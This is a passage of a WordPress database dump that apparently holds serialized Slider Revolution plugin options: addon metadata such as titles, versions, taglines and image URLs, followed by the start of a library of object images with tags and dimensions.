To\";s:4:\"sort\";s:3:\"150\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_exploding.jpg\";s:8:\"img_file\";s:43:\"revslider/addons/images/addon_exploding.jpg\";s:7:\"img_md5\";s:32:\"44d60b83cdf5b29033d41feb516b47e1\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"EL\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:23:\"revslider-sharing-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"397\";s:9:\"releaseid\";s:1:\"5\";s:4:\"slug\";s:23:\"revslider-sharing-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Social Sharing\";s:6:\"line_1\";s:17:\"Share your slides\";s:6:\"line_2\";s:50:\"with RevSlider \"actions\" because sharing is caring\";s:9:\"available\";s:5:\"3.0.1\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"165\";s:11:\"last_update\";s:10:\"2023-07-08\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:80:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_socialsharing.jpg\";s:8:\"img_file\";s:47:\"revslider/addons/images/addon_socialsharing.jpg\";s:7:\"img_md5\";s:32:\"6b074630853c4f95d5337bc85e496cbe\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SH\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:26:\"revslider-whiteboard-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"419\";s:9:\"releaseid\";s:1:\"1\";s:4:\"slug\";s:26:\"revslider-whiteboard-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Whiteboard\";s:6:\"line_1\";s:31:\"Create Hand-Drawn Presentations\";s:6:\"line_2\";s:45:\"that are understandable, memorable & engaging\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:81:\"//updates.themepunch-ext-a.tools/revslider/addons/images/whiteboard_widget_bg.jpg\";s:15:\"background_file\";s:48:\"revslider/addons/images/whiteboard_widget_bg.jpg\";s:14:\"background_md5\";s:32:\"cc69160eb95469dc033e0cc094a24847\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"170\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_whiteboard.jpg\";s:8:\"img_file\";s:44:\"revslider/addons/images/addon_whiteboard.jpg\";s:7:\"img_md5\";s:32:\"b0bb636fb30ffc3d112ba4c563395ee6\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WB\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:24:\"revslider-polyfold-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"414\";s:9:\"releaseid\";s:2:\"14\";s:4:\"slug\";s:24:\"revslider-polyfold-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:22:\"Polyfold Scroll Effect\";s:6:\"line_1\";s:32:\"Add sharp edges to your sliders \";s:6:\"line_2\";s:35:\"as they scroll into and out of view\";s:9:\"available\";s:5:\"3.0.6\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"180\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:75:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_polyfold.jpg\";s:8:\"img_file\";s:42:\"revslider/addons/images/addon_polyfold.jpg\";s:7:\"img_md5\";s:32:\"02c6af89e4208f0da5920c6c3e6bb744\";s:5:\"color\";s:7:\"#3e186f\";s:4:\"text\";s:2:\"PF\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:29:\"revslider-domain-switch-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:2:\"78\";s:9:\"releaseid\";s:2:\"11\";s:4:\"slug\";s:29:\"revslider-domain-switch-addon\";s:12:\"version_from\";s:5:\"6.0.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Domain Switch\";s:6:\"line_1\";s:17:\"Switch Image URLs\";s:6:\"line_2\";s:37:\"in sliders from one domain to another\";s:9:\"available\";s:5:\"1.0.1\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"300\";s:11:\"last_update\";s:10:\"2022-02-19\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:79:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_domainswitch.jpg\";s:8:\"img_file\";s:46:\"revslider/addons/images/addon_domainswitch.jpg\";s:7:\"img_md5\";s:32:\"f2036924e7993f94bd5c9876fa0bf09b\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"DS\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:23:\"revslider-refresh-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"415\";s:9:\"releaseid\";s:2:\"10\";s:4:\"slug\";s:23:\"revslider-refresh-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"(Re)Load\";s:6:\"line_1\";s:39:\"Reload the current page or a custom URL\";s:6:\"line_2\";s:34:\"after a certain time, loops, slide\";s:9:\"available\";s:5:\"3.0.4\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"330\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_reload.jpg\";s:8:\"img_file\";s:40:\"revslider/addons/images/addon_reload.jpg\";s:7:\"img_md5\";s:32:\"d1d34d204e627168f4cc4e7422a6d40c\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RF\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:25:\"revslider-rel-posts-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:2:\"55\";s:9:\"releaseid\";s:1:\"9\";s:4:\"slug\";s:25:\"revslider-rel-posts-addon\";s:12:\"version_from\";s:7:\"5.2.4.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Related Posts\";s:6:\"line_1\";s:25:\"Add related Posts Sliders\";s:6:\"line_2\";s:31:\"at the end of your post content\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"340\";s:11:\"last_update\";s:10:\"2023-06-12\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wprelated.jpg\";s:8:\"img_file\";s:43:\"revslider/addons/images/addon_wprelated.jpg\";s:7:\"img_md5\";s:32:\"e2e7d6c3a428a55442ba90131556c930\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RP\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:20:\"revslider-snow-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"399\";s:9:\"releaseid\";s:1:\"6\";s:4:\"slug\";s:20:\"revslider-snow-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Holiday Snow\";s:6:\"line_1\";s:12:\"Let it snow!\";s:6:\"line_2\";s:32:\"Add animated snow to any Slider \";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"380\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:71:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_snow.jpg\";s:8:\"img_file\";s:38:\"revslider/addons/images/addon_snow.jpg\";s:7:\"img_md5\";s:32:\"d6bac718866b0070198a4340041bc60b\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SN\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:23:\"revslider-gallery-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"378\";s:9:\"releaseid\";s:1:\"2\";s:4:\"slug\";s:23:\"revslider-gallery-addon\";s:12:\"version_from\";s:6:\"6.4.11\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"WordPress Gallery\";s:6:\"line_1\";s:31:\"Replace the standard WP Gallery\";s:6:\"line_2\";s:31:\"with the Sliders of your choice\";s:9:\"available\";s:5:\"2.0.5\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"430\";s:11:\"last_update\";s:10:\"2023-12-11\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wpgallery.jpg\";s:8:\"img_file\";s:43:\"revslider/addons/images/addon_wpgallery.jpg\";s:7:\"img_md5\";s:32:\"74392a04b741d83c51e55059dbb388ef\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"GA\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:22:\"revslider-backup-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:2:\"53\";s:9:\"releaseid\";s:1:\"3\";s:4:\"slug\";s:22:\"revslider-backup-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Backup\";s:6:\"line_1\";s:12:\"Make Backups\";s:6:\"line_2\";s:25:\"Revisions for your safety\";s:9:\"available\";s:5:\"2.0.3\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"500\";s:11:\"last_update\";s:10:\"2023-05-31\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_backup.jpg\";s:8:\"img_file\";s:40:\"revslider/addons/images/addon_backup.jpg\";s:7:\"img_md5\";s:32:\"104797323a0293cd3f200b0172db1186\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BU\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:19:\"revslider-404-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:2:\"62\";s:9:\"releaseid\";s:1:\"8\";s:4:\"slug\";s:19:\"revslider-404-addon\";s:12:\"version_from\";s:3:\"5.3\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:3:\"404\";s:6:\"line_1\";s:39:\"Build custom 404 \"Page not Found\" Pages\";s:6:\"line_2\";s:28:\"with Slider Revolution swag!\";s:9:\"available\";s:5:\"2.0.1\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"620\";s:11:\"last_update\";s:10:\"2022-12-04\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:70:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_404.jpg\";s:8:\"img_file\";s:37:\"revslider/addons/images/addon_404.jpg\";s:7:\"img_md5\";s:32:\"217b0d118a107dc50979740dd61228df\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"404\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:30:\"revslider-prevnext-posts-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:2:\"63\";s:9:\"releaseid\";s:1:\"9\";s:4:\"slug\";s:30:\"revslider-prevnext-posts-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Adjacent Posts\";s:6:\"line_1\";s:30:\"Display previous and next post\";s:6:\"line_2\";s:28:\"to the currently showing one\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"630\";s:11:\"last_update\";s:10:\"2023-08-04\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wpadjacent.jpg\";s:8:\"img_file\";s:44:\"revslider/addons/images/addon_wpadjacent.jpg\";s:7:\"img_md5\";s:32:\"cb1feb1257e55d0f42c29dfde2d809ed\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:21:\"revslider-login-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"388\";s:9:\"releaseid\";s:2:\"11\";s:4:\"slug\";s:21:\"revslider-login-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Login Page\";s:6:\"line_1\";s:25:\"Very simple WP Login Page\";s:6:\"line_2\";s:34:\"enhanced with your favorite slider\";s:9:\"available\";s:5:\"3.0.1\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"650\";s:11:\"last_update\";s:10:\"2023-06-12\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:72:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_login.jpg\";s:8:\"img_file\";s:39:\"revslider/addons/images/addon_login.jpg\";s:7:\"img_md5\";s:32:\"f0f2edffb4e155acf67799692428644d\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LI\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:24:\"revslider-featured-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"379\";s:9:\"releaseid\";s:2:\"12\";s:4:\"slug\";s:24:\"revslider-featured-addon\";s:12:\"version_from\";s:6:\"6.4.11\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:20:\"Post Featured Slider\";s:6:\"line_1\";s:25:\"Display a featured Slider\";s:6:\"line_2\";s:41:\"instead of a featured Image in your Posts\";s:9:\"available\";s:5:\"2.0.4\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"660\";s:11:\"last_update\";s:10:\"2023-05-31\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wpfeatured.jpg\";s:8:\"img_file\";s:44:\"revslider/addons/images/addon_wpfeatured.jpg\";s:7:\"img_md5\";s:32:\"bcc840e68194f3eb05795e1353954bda\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FT\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:23:\"revslider-weather-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"402\";s:9:\"releaseid\";s:2:\"16\";s:4:\"slug\";s:23:\"revslider-weather-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Weather\";s:6:\"line_1\";s:21:\"Every where you go...\";s:6:\"line_2\";s:36:\"...always take the weather with you!\";s:9:\"available\";s:5:\"3.0.1\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"690\";s:11:\"last_update\";s:10:\"2023-05-31\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:74:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_weather.jpg\";s:8:\"img_file\";s:41:\"revslider/addons/images/addon_weather.jpg\";s:7:\"img_md5\";s:32:\"c69d1c9a69c2dec43ca0578ac35792bd\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WT\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:30:\"revslider-duotonefilters-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"406\";s:9:\"releaseid\";s:2:\"18\";s:4:\"slug\";s:30:\"revslider-duotonefilters-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Duotone\";s:6:\"line_1\";s:7:\"Duotone\";s:6:\"line_2\";s:25:\"Because one is not enough\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"710\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:74:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_duotone.jpg\";s:8:\"img_file\";s:41:\"revslider/addons/images/addon_duotone.jpg\";s:7:\"img_md5\";s:32:\"fb666e487e7ac28e6a2a157eed1fb682\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"DTF\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}}','yes'),(225,'revslider-library-check','1719250547','yes'),(226,'revslider-library-hash','dae3de1eb57eeeee008b70e9a23844b5','yes'),(227,'rs-library','a:3:{s:4:\"hash\";s:32:\"dae3de1eb57eeeee008b70e9a23844b5\";s:7:\"objects\";a:417:{i:0;a:12:{s:2:\"id\";s:3:\"198\";s:6:\"handle\";s:16:\"object_dvd_1.png\";s:4:\"name\";s:3:\"DVD\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-10-17 12:43:17\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:1;a:12:{s:2:\"id\";s:3:\"188\";s:6:\"handle\";s:18:\"object_plant_1.png\";s:4:\"name\";s:7:\"Plant 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:2;a:12:{s:2:\"id\";s:3:\"187\";s:6:\"handle\";s:16:\"object_pen_1.png\";s:4:\"name\";s:5:\"Pen 1\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:3;a:12:{s:2:\"id\";s:3:\"172\";s:6:\"handle\";s:16:\"object_egg_1.png\";s:4:\"name\";s:3:\"Egg\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:4;a:12:{s:2:\"id\";s:3:\"171\";s:6:\"handle\";s:19:\"object_guitar_1.png\";s:4:\"name\";s:6:\"Guitar\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:5;a:12:{s:2:\"id\";s:3:\"170\";s:6:\"handle\";s:21:\"object_envelope_1.png\";s:4:\"name\";s:15:\"Closed Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:6;a:12:{s:2:\"id\";s:3:\"169\";s:6:\"handle\";s:19:\"object_postit_2.png\";s:4:\"name\";s:18:\"Postit Label White\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:7;a:12:{s:2:\"id\";s:3:\"168\";s:6:\"handle\";s:21:\"object_envelope_2.png\";s:4:\"name\";s:13:\"Open Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:8;a:12:{s:2:\"id\";s:3:\"167\";s:6:\"handle\";s:17:\"object_eggs_1.png\";s:4:\"name\";s:10:\"Egg Carton\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:9;a:12:{s:2:\"id\";s:3:\"166\";s:6:\"handle\";s:25:\"object_bottleopener_1.png\";s:4:\"name\";s:13:\"Bottle Opener\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:10;a:12:{s:2:\"id\";s:3:\"165\";s:6:\"handle\";s:23:\"object_blueprints_1.png\";s:4:\"name\";s:10:\"Blueprints\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:11;a:12:{s:2:\"id\";s:3:\"164\";s:6:\"handle\";s:22:\"object_holepunch_1.png\";s:4:\"name\";s:10:\"Hole punch\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:12;a:12:{s:2:\"id\";s:3:\"163\";s:6:\"handle\";s:20:\"object_speaker_1.png\";s:4:\"name\";s:13:\"Black Speaker\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New 